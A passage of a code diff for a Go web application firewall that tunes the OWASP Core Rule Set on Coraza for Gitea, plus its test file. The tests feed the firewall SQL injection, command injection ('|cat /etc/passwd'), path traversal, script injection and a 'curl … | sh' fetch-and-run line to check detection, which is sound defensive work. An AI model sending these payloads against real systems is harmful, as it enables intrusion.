# The first change: PUT, PATCH and DELETE are allowed besides GET, HEAD,
# POST and OPTIONS.
SecAction "id:900200,phase:1,pass,nolog,\
setvar:'tx.allowed_methods=GET HEAD POST OPTIONS PUT PATCH DELETE'"
# The second: Expect and Content-Encoding are taken off the Core Rule Set's
# list of the headers it refuses. Content-Encoding goes back on it for a
# body the Core Rule Set reads (900260 in bodyDirectives).
SecAction "id:900250,phase:1,pass,nolog,\
setvar:'tx.restricted_headers_basic=/proxy/ /lock-token/ /content-range/ \
/if/ /x-http-method-override/ /x-http-method/ /x-method-override/ \
/x-middleware-subrequest/'"
%s
# Coraza keeps the first 1000 query parameters of a request, and the first
# 1000 fields of a form data or JSON body, and drops the rest, which no
# rule then reads, so a request with more adds 5 to the score, as a rule
# the Core Rule Set rates critical does. Coraza's recommended
# configuration refuses such a request in its rules 200004 and 200005.
# This rule runs once the body is read, and before the Core Rule Set adds
# up the score in the same phase.
SecArgumentsLimit 1000
SecRule ARGUMENTS_LIMIT_REACHED "@eq 1" "id:900300,phase:2,pass,\
severity:'CRITICAL',setvar:'tx.inbound_anomaly_score_pl1=+5'"
# The sixth: only the rules for requests are loaded, and no response is
# inspected.
Include @owasp_crs/REQUEST-*.conf
# The third: redirect_uri is not checked for a URL naming an IP address or
# localhost. Coraza matches a parameter name here, and in the fourth,
# without regard to case. ARGS holds the fields of a form data or multipart
# body Coraza reads as well as the query parameters, so a field of one of
# these names is left out too.
SecRuleUpdateTargetById 931100 "!ARGS:redirect_uri"
SecRuleUpdateTargetById 934110 "!ARGS:redirect_uri"
# The fourth: the query parameters in which gitea sends names within a
# repository or its own records, or a page of its own site, are not
# checked against the lists of system files, shell paths and command
# names. Coraza takes one rule id per directive.
SecRuleUpdateTargetById 930120 "!ARGS:path|!ARGS:files|!ARGS:skip-to|\
!ARGS:sub_path|!ARGS:ref|!ARGS:sha|!ARGS:branch|!ARGS:workflow|\
!ARGS:artifactName|!ARGS:redirect_to"
SecRuleUpdateTargetById 932160 "!ARGS:path|!ARGS:files|!ARGS:skip-to|\
!ARGS:sub_path|!ARGS:ref|!ARGS:sha|!ARGS:branch|!ARGS:workflow|\
!ARGS:artifactName|!ARGS:redirect_to"
SecRuleUpdateTargetById 932260 "!ARGS:path|!ARGS:files|!ARGS:skip-to|\
!ARGS:sub_path|!ARGS:ref|!ARGS:sha|!ARGS:branch|!ARGS:workflow|\
!ARGS:artifactName|!ARGS:redirect_to"
# The fifth, for Referer: it is not checked for a Unix command without
# arguments, or for Java starting a process. The cookies are left out in
# Inspect.
SecRuleUpdateTargetById 932340 "!REQUEST_HEADERS:Referer"
SecRuleUpdateTargetById 944110 "!REQUEST_HEADERS:Referer"
`
// bodyDirectives have the Core Rule Set read the part of a request body
// Inspect gives it, which is at most one byte longer than the limit, up to
// the limit, %d bytes, and read JSON and XML as Coraza's recommended
// configuration has it in its rules 200000, 200001 and 200006, with
// text/json, and any application or text type ending in +xml or +json,
// besides; form data and multipart Coraza knows by itself. %% stands for
// a % Coraza reads.
const bodyDirectives = `
SecRequestBodyAccess On
SecRequestBodyLimit %d
SecRequestBodyLimitAction ProcessPartial
SecRule REQUEST_HEADERS:Content-Type \
"@rx ^(?:application|text)/(?:[a-z0-9.-]+[+])?xml" \
"id:900410,phase:1,pass,nolog,t:none,t:lowercase,ctl:requestBodyProcessor=XML"
SecRule REQUEST_HEADERS:Content-Type \
"@rx ^(?:application|text)/(?:[a-z0-9.-]+[+])?json" \
"id:900420,phase:1,pass,nolog,t:none,t:lowercase,ctl:requestBodyProcessor=JSON"
# The rest of the second change: Content-Encoding is refused again on a
# body of a kind the Core Rule Set reads, since a compressed body cannot be
# inspected.
SecRule REQBODY_PROCESSOR "@rx ^(?:URLENCODED|MULTIPART|JSON|XML)$" \
"id:900260,phase:1,pass,nolog,\
setvar:'tx.restricted_headers_basic=%%{tx.restricted_headers_basic} \
/content-encoding/'"
# A body Coraza fails to parse (900440), and a multipart body that fails
# its strict checks (900450), each add 5 to the score, as a rule the Core
# Rule Set rates critical does: no rule reads what comes after the fault,
# which the app may still read. Coraza's recommended configuration refuses
# them in its rules 200002 and 200003. A multipart body the limit cuts
# before the colon of a part's header line, or between the carriage return
# and the line feed that end a part's header line or the empty line after
# its headers, adds 5 too, since Coraza takes the line the limit cuts for a
# malformed header. Coraza parses any form data body.
SecRule REQBODY_ERROR "!@eq 0" "id:900440,phase:2,pass,severity:'CRITICAL',\
setvar:'tx.inbound_anomaly_score_pl1=+5'"
SecRule MULTIPART_STRICT_ERROR "!@eq 0" "id:900450,phase:2,pass,\
severity:'CRITICAL',setvar:'tx.inbound_anomaly_score_pl1=+5'"
`
// cookiesNotRead are the cookies the Core Rule Set reads a request
// without, the rest of the fifth change.
//
//nolint:gochecknoglobals // a constant cannot be a list
var cookiesNotRead = []string{"gitea_flash", "redirect_to"}
// Params are what New needs.
type Params struct {
// ParanoiaLevel is SWWAF_WAF_PARANOIA_LEVEL, from 1 to 4.
ParanoiaLevel int
// DisabledRules are the ids of the rules switched off
// (SWWAF_WAF_DISABLED_RULES).
DisabledRules []int
// BodyLimit is the most of a request body the Core Rule Set reads
// (SWWAF_WAF_BODY_LIMIT), 0 while it is off and it reads none.
BodyLimit int64
}
// CoreRuleSet is the Core Rule Set, ready to inspect requests. It is safe
// for concurrent use.
type CoreRuleSet struct {
waf coraza.WAF
bodyLimit int64
}
// New returns the Core Rule Set with the six changes, at params'
// paranoia level, without the rules it switches off, and reading request
// bodies up to params' limit.
func New(params Params) (*CoreRuleSet, error) {
body := ""
if params.BodyLimit > 0 {
body = fmt.Sprintf(bodyDirectives, params.BodyLimit)
}
text := fmt.Sprintf(directives, params.ParanoiaLevel, body)
if len(params.DisabledRules) > 0 {
ids := make([]string, len(params.DisabledRules))
for i, id := range params.DisabledRules {
ids[i] = strconv.Itoa(id)
}
text += "SecRuleRemoveById " + strings.Join(ids, " ") + "\n"
}
waf, err := coraza.NewWAF(coraza.NewWAFConfig().
WithRootFS(coreruleset.FS).
WithDirectives(text))
if err != nil {
return nil, fmt.Errorf("load the Core Rule Set: %w", err)
}
return &CoreRuleSet{waf: waf, bodyLimit: params.BodyLimit}, nil
}
// Result is what the Core Rule Set found in a request.
type Result struct {
// RuleIDs are the ids of the rules that matched, in the order they
// ran.
RuleIDs []int
// Score is the request's anomaly score: what those rules add up to.
Score int
}
// Inspect runs the Core Rule Set on r, a request from client: on its
// method, its URL with the query, and its headers, the Cookie header
// without the cookies in cookiesNotRead, and on body, r's body as the
// caller has it, as readBody reads it. It returns what it found, what it
// read of body, which the app is still to be sent, and the error that
// ended the reading early, if one did.
func (c *CoreRuleSet) Inspect(
r *http.Request, client netip.Addr, body io.Reader,
) (Result, []byte, error) {
tx := c.waf.NewTransaction()
// Closing would remove the files Coraza wrote, and it writes none.
defer func() { _ = tx.Close() }()
tx.ProcessConnection(client.String(), 0, "", 0)
tx.ProcessURI(r.URL.String(), r.Method, r.Proto)
for name, values := range r.Header {
for _, value := range values {
if name == "Cookie" {
value = withoutCookiesNotRead(value)
if value == "" {
continue // it held those cookies alone
}
}
tx.AddRequestHeader(name, value)
}
}
// Go's server takes these two out of the headers.
tx.AddRequestHeader("Host", r.Host)
for _, encoding := range r.TransferEncoding {
tx.AddRequestHeader("Transfer-Encoding", encoding)
}
tx.ProcessRequestHeaders()
read, err := c.readBody(tx, body)
// This reads the body in memory and runs the rest of the rules, and
// cannot fail.
_, _ = tx.ProcessRequestBody()
var ids []int
for _, matched := range tx.MatchedRules() {
// The rules that look for attacks have a severity; the others set
// the Core Rule Set up and add up the score.
rule := matched.Rule()
if rule.Severity() != types.RuleSeverityUnset {
ids = append(ids, rule.ID())
}
}
return Result{RuleIDs: ids, Score: score(tx)}, read, err
}
// readBody reads body, the body of the request in tx, which has run on
// the request's headers, while SWWAF_WAF_BODY_LIMIT is set and the body is
// of a kind the Core Rule Set reads: form data and multipart, of which it
// reads the first c.bodyLimit bytes, and JSON and XML, which it reads only
// when they are no longer than that, since they cannot be read in part.
// readBody reads one byte past the limit, to tell which they are, gives
// the Core Rule Set what it reads, and returns what it read and the error
// that ended the reading early, if one did.
func (c *CoreRuleSet) readBody(tx types.Transaction, body io.Reader) ([]byte, error) {
if c.bodyLimit == 0 {
return nil, nil
}
inPart := false
// How the body is read is a variable of the transaction, which only
// Coraza's interface for plugins reads.
state := tx.(plugintypes.TransactionState) //nolint:forcetypeassert // every one is
switch state.Variables().RequestBodyProcessor().Get() {
case "URLENCODED", "MULTIPART":
inPart = true
case "JSON", "XML":
default:
return nil, nil
}
read, err := io.ReadAll(io.LimitReader(body, c.bodyLimit+1))
if inPart || (err == nil && int64(len(read)) <= c.bodyLimit) {
// Coraza holds what it reads of the body in memory, up to the
// limit, so this cannot fail.
_, _, _ = tx.WriteRequestBody(read)
}
return read, err
}
// score returns the anomaly score the Core Rule Set added up in tx, a
// transaction it has run, or 0 if a rule that adds it up is switched off.
func score(tx types.Transaction) int {
// The score is in a variable of the transaction, which only Coraza's
// interface for plugins reads.
state := tx.(plugintypes.TransactionState) //nolint:forcetypeassert // every one is
values := state.Variables().TX().Get("blocking_inbound_anomaly_score")
if len(values) == 0 {
return 0
}
n, _ := strconv.Atoi(values[0])
return n
}
// withoutCookiesNotRead returns value, a Cookie header's, without the
// cookies in cookiesNotRead.
func withoutCookiesNotRead(value string) string {
var kept []string
for cookie := range strings.SplitSeq(value, ";") {
name, _, _ := strings.Cut(strings.TrimSpace(cookie), "=")
if !slices.Contains(cookiesNotRead, name) {
kept = append(kept, cookie)
}
}
return strings.Join(kept, ";")
}
+688
View File
@@ -0,0 +1,688 @@
package waf_test
import (
"net/http"
"net/http/httptest"
"net/netip"
"net/url"
"path/filepath"
"reflect"
"strconv"
"strings"
"testing"
"sneak.berlin/go/smallwebwaf/internal/waf"
)
// defaultDisabledRules are the rules SWWAF_WAF_DISABLED_RULES switches off
// by default.
//
//nolint:gochecknoglobals // a constant cannot be a list
var defaultDisabledRules = []int{920340, 920420, 920440, 920640, 930130, 930140}
// newCoreRuleSet returns the Core Rule Set at paranoia level level, with
// the rules in disabled switched off.
func newCoreRuleSet(t *testing.T, level int, disabled ...int) *waf.CoreRuleSet {
t.Helper()
crs, err := waf.New(waf.Params{ParanoiaLevel: level, DisabledRules: disabled})
if err != nil {
t.Fatalf("load the Core Rule Set: %v", err)
}
return crs
}
// request is a request a test inspects: its method, its target, the path
// and the query as a client sends them, and its headers, each written
// "Name: value".
type request struct {
method, target string
headers []string
}
// get is a GET request for target with headers.
func get(target string, headers ...string) request {
return request{http.MethodGet, target, headers}
}
// inspect returns what crs finds in r, sent to git.example by a browser,
// whose Host, User-Agent and Accept r.headers may replace.
func inspect(t *testing.T, crs *waf.CoreRuleSet, r request) waf.Result {
t.Helper()
result, _ := inspectBody(t, crs, r, "")
return result
}
// inspectBody is inspect for r with body, which is announced with its
// Content-Length unless it is "", and returns what crs read of body too.
func inspectBody(
t *testing.T, crs *waf.CoreRuleSet, r request, body string,
) (waf.Result, string) {
t.Helper()
req := httptest.NewRequestWithContext(t.Context(), r.method,
"http://git.example"+r.target, strings.NewReader(body))
req.Header.Set("User-Agent", "Mozilla/5.0 (X11; Linux x86_64; rv:131.0) "+
"Gecko/20100101 Firefox/131.0")
req.Header.Set("Accept", "text/html")
if body != "" {
req.Header.Set("Content-Length", strconv.Itoa(len(body)))
}
for _, header := range r.headers {
// Go's server keeps Host and Transfer-Encoding out of the headers.
name, value, _ := strings.Cut(header, ": ")
switch name {
case "Host":
req.Host = value
case "Transfer-Encoding":
req.TransferEncoding = []string{value}
default:
req.Header.Set(name, value)
}
}
result, read, err := crs.Inspect(req, netip.MustParseAddr("203.0.113.9"), req.Body)
if err != nil {
t.Fatalf("read the body: %v", err)
}
return result, string(read)
}
// wantResult checks what crs finds in r.
func wantResult(t *testing.T, crs *waf.CoreRuleSet, r request, want waf.Result) {
t.Helper()
if got := inspect(t, crs, r); !reflect.DeepEqual(got, want) {
t.Errorf("%s %s %q: %+v, want %+v", r.method, r.target, r.headers, got, want)
}
}
// matched is the result of a request that the rules ids match, each of
// them a critical one, which adds 5 to the score.
func matched(ids ...int) waf.Result {
const critical = 5
return waf.Result{RuleIDs: ids, Score: critical * len(ids)}
}
// atDefaults returns the Core Rule Set as smallwebwaf runs it by default.
func atDefaults(t *testing.T) *waf.CoreRuleSet {
t.Helper()
return newCoreRuleSet(t, 1, defaultDisabledRules...)
}
// wantChange checks that crs lets through passes, a gitea request one of
// the six changes is for, and still finds result in refused, a request
// like it that the change is not for.
func wantChange(
t *testing.T, crs *waf.CoreRuleSet, passes, refused request, result waf.Result,
) {
t.Helper()
wantResult(t, crs, passes, waf.Result{})
wantResult(t, crs, refused, result)
}
func TestPutPatchAndDeleteAreAllowed(t *testing.T) {
t.Parallel()
crs := atDefaults(t)
for _, r := range []request{
{http.MethodPut, "/v2/owner/image/blobs/uploads/1?digest=sha256:ab", nil},
{http.MethodPatch, "/api/v1/repos/owner/repo/issues/1", nil},
{http.MethodDelete, "/api/v1/repos/owner/repo/branches/old", nil},
} {
wantChange(t, crs, r, request{http.MethodTrace, r.target, nil}, matched(911100))
}
wantChange(t, crs, get("/"), request{"PROPFIND", "/", nil}, matched(911100))
}
func TestExpectAndContentEncodingAreAllowed(t *testing.T) {
t.Parallel()
const (
pushType = "Content-Type: application/x-git-receive-pack-request"
fetchType = "Content-Type: application/x-git-upload-pack-request"
length = "Content-Length: 1024"
push = "/owner/repo.git/git-receive-pack"
fetch = "/owner/repo.git/git-upload-pack"
)
crs := atDefaults(t)
wantResult(t, crs,
request{http.MethodPost, push, []string{pushType, length, "Expect: 100-continue"}},
waf.Result{})
wantResult(t, crs,
request{http.MethodPost, fetch, []string{
fetchType, length, "Content-Encoding: gzip",
}},
waf.Result{})
// Every other header on the Core Rule Set's list stays refused.
for _, header := range []string{
"Proxy: http://proxy.example",
"Lock-Token: token",
"Content-Range: bytes 0-1023/1024",
"If: token",
"X-HTTP-Method-Override: DELETE",
"X-HTTP-Method: DELETE",
"X-Method-Override: DELETE",
"X-Middleware-Subrequest: middleware",
} {
wantResult(t, crs,
request{http.MethodPost, push, []string{pushType, length, header}},
matched(920450))
}
}
func TestTransferEncodingIsRead(t *testing.T) {
t.Parallel()
// git sends a large push in chunks, with no Content-Length. Without
// Transfer-Encoding, that would be a POST without a length (920180).
wantResult(t, atDefaults(t),
request{http.MethodPost, "/owner/repo.git/git-receive-pack", []string{
"Content-Type: application/x-git-receive-pack-request",
"Transfer-Encoding: chunked",
}},
waf.Result{})
}
func TestMoreParametersThanCorazaKeepsIsAMatch(t *testing.T) {
t.Parallel()
const attack = "id=1'%20OR%20'1'='1"
crs := atDefaults(t)
// Coraza keeps 1000: an attack that is the 1000th is read, and one
// after it is not, but the request is a match all the same.
wantResult(t, crs, get("/?"+strings.Repeat("a=1&", 999)+attack), matched(942100))
wantResult(t, crs, get("/?"+strings.Repeat("a=1&", 1000)+attack), matched(900300))
// So it is with the fields of a form data or JSON body.
crs = readingBodies(t)
for _, tc := range []struct{ header, body string }{
{formData, strings.Repeat("a=1&", 999) + attack},
{jsonBody, `{"a":[` + strings.Repeat("1,", 998) + `1],"id":"` + injection + `"}`},
} {
wantBody(t, crs, post(tc.header), tc.body, matched(942100), tc.body)
}
for _, tc := range []struct{ header, body string }{
{formData, strings.Repeat("a=1&", 1000) + attack},
{jsonBody, `{"a":[` + strings.Repeat("1,", 999) + `1],"id":"` + injection + `"}`},
} {
wantBody(t, crs, post(tc.header), tc.body, matched(900300), tc.body)
}
}
func TestRedirectURIMayNameALocalAddress(t *testing.T) {
t.Parallel()
const oauth = "/login/oauth/authorize?client_id=tea&response_type=code&"
crs := atDefaults(t)
wantChange(t, crs, get(oauth+"redirect_uri=http://127.0.0.1:52341/"),
get(oauth+"next=http://127.0.0.1:52341/"), matched(931100, 934110))
wantChange(t, crs, get(oauth+"redirect_uri=http://localhost:52341/"),
get(oauth+"next=http://localhost:52341/"), matched(934110))
}
func TestParametersGiteaSendsNamesInSkipTheListsOfFilesPathsAndCommands(t *testing.T) {
t.Parallel()
crs := atDefaults(t)
for _, value := range []struct {
name string
// result is what a parameter that is not one of gitea's gets.
result waf.Result
}{
// A file on the list of system files.
{".gitignore", matched(930120)},
// A command's name, after a directory on the list of shell paths.
{"bin/docker-entrypoint", matched(932260, 932160)},
} {
for _, parameter := range []string{
"path", "files", "skip-to", "sub_path", "ref", "sha", "branch", "workflow",
"artifactName", "redirect_to",
} {
wantChange(t, crs, get("/?"+parameter+"="+value.name),
get("/?q="+value.name), value.result)
}
}
// What only those rules refuse gets through there too, but path
// traversal and SQL injection are still refused.
wantChange(t, crs, get("/?path=|cat%20/etc/passwd"), get("/?q=|cat%20/etc/passwd"),
matched(930120, 932160))
wantResult(t, crs, get("/?path=../../etc/passwd"),
waf.Result{RuleIDs: []int{930100, 930110}, Score: 20})
wantResult(t, crs, get("/?path=1'%20OR%20'1'='1"), matched(942100))
}
func TestParameterNamesAreMatchedWithoutRegardToCase(t *testing.T) {
t.Parallel()
crs := atDefaults(t)
wantChange(t, crs, get("/?Path=.gitignore"), get("/?q=.gitignore"), matched(930120))
wantChange(t, crs, get("/?REDIRECT_URI=http://127.0.0.1:52341/"),
get("/?next=http://127.0.0.1:52341/"), matched(931100, 934110))
}
func TestCookiesGiteaFlashAndRedirectToAreNotRead(t *testing.T) {
t.Parallel()
const (
flash = "success%3DFile%2Bpackage.json%2Bdeleted"
redirectTo = "%2Fowner%2Frepo%2Fsrc%2Fbranch%2Fmain%2Fpackage.json"
)
crs := atDefaults(t)
wantChange(t, crs, get("/owner/repo", "Cookie: gitea_flash="+flash),
get("/owner/repo", "Cookie: flash="+flash), matched(930120))
wantChange(t, crs, get("/", "Cookie: redirect_to="+redirectTo),
get("/", "Cookie: redirect="+redirectTo), matched(930120))
// Among other cookies, which are read.
wantChange(t, crs,
get("/", "Cookie: lang=en-US; gitea_flash="+flash+"; redirect_to="+redirectTo+
"; i_like_gitea=abc"),
get("/", "Cookie: lang=en-US; gitea_flash="+flash+"; redirect="+redirectTo+
"; i_like_gitea=abc"),
matched(930120))
}
func TestRefererIsNotCheckedForACommandOrJavaStartingAProcess(t *testing.T) {
t.Parallel()
const (
search = "https://git.example/explore/repos?q=env"
runtimeJava = "https://git.example/openjdk/jdk/src/branch/master/src/" +
"java.base/share/classes/java/lang/Runtime.java"
)
crs := atDefaults(t)
wantChange(t, crs, get("/", "Referer: "+search), get("/", "User-Agent: "+search),
matched(932340))
wantChange(t, crs, get("/", "Referer: "+runtimeJava),
get("/", "X-Page: "+runtimeJava), matched(944110))
// It is still checked for script and SQL injection.
wantResult(t, crs,
get("/", "Referer: https://git.example/?q=<script>alert(1)</script>"),
matched(941110, 941160))
wantResult(t, crs, get("/", "Referer: https://git.example/?q=1' OR '1'='1"),
matched(942100))
}
func TestEmptyHeaderIsRead(t *testing.T) {
t.Parallel()
// An empty User-Agent is a notice, which adds 2.
wantResult(t, atDefaults(t), get("/", "User-Agent: "),
waf.Result{RuleIDs: []int{920330}, Score: 2})
}
func TestParanoiaLevel(t *testing.T) {
t.Parallel()
// Accept-Charset is refused from paranoia level 2.
r := get("/", "Accept-Charset: utf-8")
wantResult(t, newCoreRuleSet(t, 1), r, waf.Result{})
wantResult(t, newCoreRuleSet(t, 2), r, matched(920451))
}
func TestEachDisabledRuleIsSwitchedOff(t *testing.T) {
t.Parallel()
// A method not allowed, and a Host that is an IP address, a warning,
// which adds 3.
r := request{http.MethodTrace, "/", []string{"Host: 192.0.2.1"}}
wantResult(t, newCoreRuleSet(t, 1), r,
waf.Result{RuleIDs: []int{911100, 920350}, Score: 8})
wantResult(t, newCoreRuleSet(t, 1, 920350, 911100), r, waf.Result{})
}
// bodyLimit is SWWAF_WAF_BODY_LIMIT in the tests that read bodies.
const bodyLimit = 8 << 10
// The Content-Type headers of the kinds of body the Core Rule Set reads.
const (
formData = "Content-Type: application/x-www-form-urlencoded"
multipart = "Content-Type: multipart/form-data; boundary=b"
jsonBody = "Content-Type: application/json"
xmlBody = "Content-Type: application/xml"
)
// injection is an SQL injection, which rule 942100 matches.
const injection = "1' OR '1'='1"
// readingBodies returns the Core Rule Set as smallwebwaf runs it by
// default, but reading bodies up to bodyLimit.
func readingBodies(t *testing.T) *waf.CoreRuleSet {
t.Helper()
crs, err := waf.New(waf.Params{
ParanoiaLevel: 1, DisabledRules: defaultDisabledRules, BodyLimit: bodyLimit,
})
if err != nil {
t.Fatalf("load the Core Rule Set: %v", err)
}
return crs
}
// post is a POST request for / with a body of the type contentType, a
// Content-Type header, gives, and headers besides.
func post(contentType string, headers ...string) request {
return request{http.MethodPost, "/", append([]string{contentType}, headers...)}
}
// field is a part of a multipart body: the field name, holding value.
func field(name, value string) string {
return "--b\r\nContent-Disposition: form-data; name=\"" + name + "\"\r\n\r\n" +
value + "\r\n"
}
// end ends a multipart body.
const end = "--b--\r\n"
// padded returns head and tail with as many a's between them as make n
// bytes in all.
func padded(head, tail string, n int) string {
return head + strings.Repeat("a", n-len(head)-len(tail)) + tail
}
// wantBody checks what crs finds in r with body, and that what it read of
// body is read.
func wantBody(
t *testing.T, crs *waf.CoreRuleSet, r request, body string, want waf.Result,
read string,
) {
t.Helper()
got, gotRead := inspectBody(t, crs, r, body)
if !reflect.DeepEqual(got, want) || gotRead != read {
t.Errorf("%q with a body of %d bytes, %.40q: %+v, reading %d bytes, "+
"want %+v, reading %d", r.headers, len(body), body, got, len(gotRead),
want, len(read))
}
}
func TestBodiesAreReadOnlyWhileBodyLimitIsSet(t *testing.T) {
t.Parallel()
off, on := atDefaults(t), readingBodies(t)
for _, tc := range []struct{ header, body string }{
{formData, "q=" + url.QueryEscape(injection)},
{multipart, field("q", injection) + end},
{jsonBody, `{"q":"` + injection + `"}`},
{xmlBody, "<q>" + injection + "</q>"},
} {
wantBody(t, off, post(tc.header), tc.body, waf.Result{}, "")
wantBody(t, on, post(tc.header), tc.body, matched(942100), tc.body)
}
}
func TestFormDataAndMultipartAreReadUpToTheLimit(t *testing.T) {
t.Parallel()
crs := readingBodies(t)
pad := strings.Repeat("a", bodyLimit)
for _, tc := range []struct{ header, attackFirst, attackLast string }{
{
formData, "q=" + url.QueryEscape(injection) + "&pad=" + pad,
"pad=" + pad + "&q=" + url.QueryEscape(injection),
},
{
multipart, field("q", injection) + field("pad", pad) + end,
field("pad", pad) + field("q", injection) + end,
},
} {
wantBody(t, crs, post(tc.header), tc.attackFirst, matched(942100),
tc.attackFirst[:bodyLimit+1])
wantBody(t, crs, post(tc.header), tc.attackLast, waf.Result{},
tc.attackLast[:bodyLimit+1])
}
// To the byte: a system file's path is found when it ends at the limit,
// and not when its last letter is past it, which is still read.
atLimit := padded("pad=", "&q=/etc/passwd", bodyLimit)
wantBody(t, crs, post(formData), atLimit, matched(930120, 932160), atLimit)
pastLimit := padded("pad=", "&q=/etc/passwd", bodyLimit+1)
wantBody(t, crs, post(formData), pastLimit, waf.Result{}, pastLimit)
}
func TestJSONAndXMLAreReadOnlyWhenNoLargerThanTheLimit(t *testing.T) {
t.Parallel()
crs := readingBodies(t)
for _, tc := range []struct{ header, head, tail string }{
{jsonBody, `{"q":"` + injection + `","pad":"`, `"}`},
{xmlBody, "<r><q>" + injection + "</q><pad>", "</pad></r>"},
} {
fits := padded(tc.head, tc.tail, bodyLimit)
wantBody(t, crs, post(tc.header), fits, matched(942100), fits)
larger := padded(tc.head, tc.tail, bodyLimit+1)
wantBody(t, crs, post(tc.header), larger, waf.Result{}, larger)
}
}
func TestOtherBodiesAreNotRead(t *testing.T) {
t.Parallel()
crs := readingBodies(t)
// Read as form data, which the Core Rule Set does with a body of a type
// it does not know, this would be an SQL injection.
body := "q=" + url.QueryEscape(injection)
for _, header := range []string{
"Content-Type: application/octet-stream",
"Content-Type: text/plain",
"Content-Type: application/x-git-receive-pack-request",
} {
wantBody(t, crs, post(header), body, waf.Result{}, "")
}
}
func TestContentEncodingIsRefusedOnTheKindsOfBodyTheCoreRuleSetReads(t *testing.T) {
t.Parallel()
const gzip = "Content-Encoding: gzip"
crs := readingBodies(t)
for _, tc := range []struct{ header, body string }{
{formData, "a=1"},
{multipart, field("a", "1") + end},
{jsonBody, `{"a":1}`},
{xmlBody, "<a>1</a>"},
} {
wantBody(t, crs, post(tc.header, gzip), tc.body, matched(920450), tc.body)
}
// Whatever its size: a JSON body larger than the limit is not read, but
// Content-Encoding on it is refused all the same.
larger := strings.Repeat("a", bodyLimit+1)
wantBody(t, crs, post(jsonBody, gzip), larger, matched(920450), larger)
// It is allowed on a body of any other kind, and on every body while no
// body is read.
fetch := "Content-Type: application/x-git-upload-pack-request"
wantBody(t, crs, post(fetch, gzip), "a", waf.Result{}, "")
wantBody(t, atDefaults(t), post(formData, gzip), "a", waf.Result{}, "")
}
func TestParametersGiteaSendsNamesInAreLeftOutAmongFormFieldsToo(t *testing.T) {
t.Parallel()
crs := readingBodies(t)
local := url.QueryEscape("http://127.0.0.1:52341/")
for _, tc := range []struct {
body string
want waf.Result
}{
{"path=.gitignore", waf.Result{}},
{"q=.gitignore", matched(930120)},
{"redirect_uri=" + local, waf.Result{}},
{"next=" + local, matched(931100, 934110)},
} {
wantBody(t, crs, post(formData), tc.body, tc.want, tc.body)
}
body := field("path", ".gitignore") + end
wantBody(t, crs, post(multipart), body, waf.Result{}, body)
body = field("q", ".gitignore") + end
wantBody(t, crs, post(multipart), body, matched(930120), body)
// A JSON body's field is named by its path, here json.path, and is
// checked.
body = `{"path":".gitignore"}`
wantBody(t, crs, post(jsonBody), body, matched(930120), body)
}
func TestGiteaBodiesTheCoreRuleSetRefuses(t *testing.T) {
t.Parallel()
crs := readingBodies(t)
// A comment that shows a shell command.
const text = "Try `curl -s https://example.org | sh` first."
comment := "content=" + url.QueryEscape(text)
wantBody(t, crs, post(formData), comment, matched(932235), comment)
// An attachment named like a log file.
attachment := "--b\r\nContent-Disposition: form-data; name=\"file\"; " +
"filename=\"debug.log\"\r\nContent-Type: text/plain\r\n\r\nstarted\r\n" + end
wantBody(t, crs, post(multipart), attachment, matched(932180), attachment)
}
func TestTypesEndingInXMLOrJSONAndTextJSONAreRead(t *testing.T) {
t.Parallel()
crs := readingBodies(t)
for _, tc := range []struct{ contentType, body string }{
{"application/atom+xml", "<q>" + injection + "</q>"},
{"application/vnd.example+xml", "<q>" + injection + "</q>"},
{"application/vnd.example+json", `{"q":"` + injection + `"}`},
{"text/json", `{"q":"` + injection + `"}`},
} {
wantBody(t, crs, post("Content-Type: "+tc.contentType), tc.body,
matched(942100), tc.body)
}
}
func TestBodyCorazaCannotParseIsAMatch(t *testing.T) {
t.Parallel()
crs := readingBodies(t)
// An end tag after the root element, past which Coraza reads none of
// the body, while an app may still read the attack before it.
body := "<q>" + injection + "</q></r>"
wantBody(t, crs, post(xmlBody), body, matched(900440), body)
// The multipart bodies Coraza cannot parse fail its strict checks too:
// one whose type names its boundary twice, and one with a part header
// that has no colon, before the attack. They do so padded past the
// limit too, which cuts them in the padding.
noColon := "--b\r\nContent-Disposition form-data; name=\"a\"\r\n\r\n1\r\n"
pad := field("pad", strings.Repeat("a", bodyLimit))
for _, tc := range []struct{ header, head string }{
{multipart + "; boundary=c", ""},
{multipart, noColon},
} {
body = tc.head + field("q", injection) + end
wantBody(t, crs, post(tc.header), body, matched(900440, 900450), body)
body = tc.head + field("q", injection) + pad + end
wantBody(t, crs, post(tc.header), body, matched(900440, 900450),
body[:bodyLimit+1])
}
}
func TestMultipartBodyCutBeforeAPartHeadersColonIsAMatch(t *testing.T) {
t.Parallel()
// The limit falls in the middle of the name of the second part's
// header, which Coraza, reading up to the limit, cannot tell from a
// header without a colon.
cut := "--b\r\nContent-Di"
first := field("pad", strings.Repeat("a", bodyLimit-len(field("pad", ""))-len(cut)))
body := first + cut + "sposition: form-data; name=\"q\"\r\n\r\n1\r\n" + end
wantBody(t, readingBodies(t), post(multipart), body, matched(900440, 900450),
body[:bodyLimit+1])
}
func TestMultipartBodyCutBeforeALineFeedInAPartsHeadersIsAMatch(t *testing.T) {
t.Parallel()
crs := readingBodies(t)
headerLine := "--b\r\nContent-Disposition: form-data; name=\"q\"\r"
// The limit falls between the carriage return and the line feed that
// end the second part's header line, and then between those that end
// the empty line after it. Coraza, reading up to the limit, takes the
// line ending in a lone carriage return for a malformed header.
for _, cut := range []int{len(headerLine), len(headerLine + "\n\r")} {
first := field("pad", strings.Repeat("a", bodyLimit-len(field("pad", ""))-cut))
body := first + field("q", "1") + end
wantBody(t, crs, post(multipart), body, matched(900440, 900450),
body[:bodyLimit+1])
}
}
// TestCorazaWritesNoFile is not parallel, since it sets TMPDIR, the
// system's temporary directory, for the whole test process.
func TestCorazaWritesNoFile(t *testing.T) {
// The system's temporary directory is one that does not exist, so that
// Coraza could write nothing there: built without no_fs_access, it
// refuses to load, and could not write a file of a multipart body.
t.Setenv("TMPDIR", filepath.Join(t.TempDir(), "missing"))
body := "--b\r\nContent-Disposition: form-data; name=\"file\"; " +
"filename=\"notes.txt\"\r\nContent-Type: text/plain\r\n\r\n" +
strings.Repeat("a", 1000) + "\r\n" + field("q", injection) + end
wantBody(t, readingBodies(t), post(multipart), body, matched(942100), body)
}
func TestBodyLimitOf1GLoads(t *testing.T) {
t.Parallel()
_, err := waf.New(waf.Params{ParanoiaLevel: 1, BodyLimit: 1 << 30})
if err != nil {
t.Errorf("load the Core Rule Set reading bodies up to 1G: %v", err)
}
}
+2 -2
View File
@@ -1,7 +1,7 @@
#!/bin/sh #!/bin/sh
# script/build: build bin/smallwebwaf on the host, with Go installed, for # script/build: build bin/smallwebwaf on the host, with Go installed, for
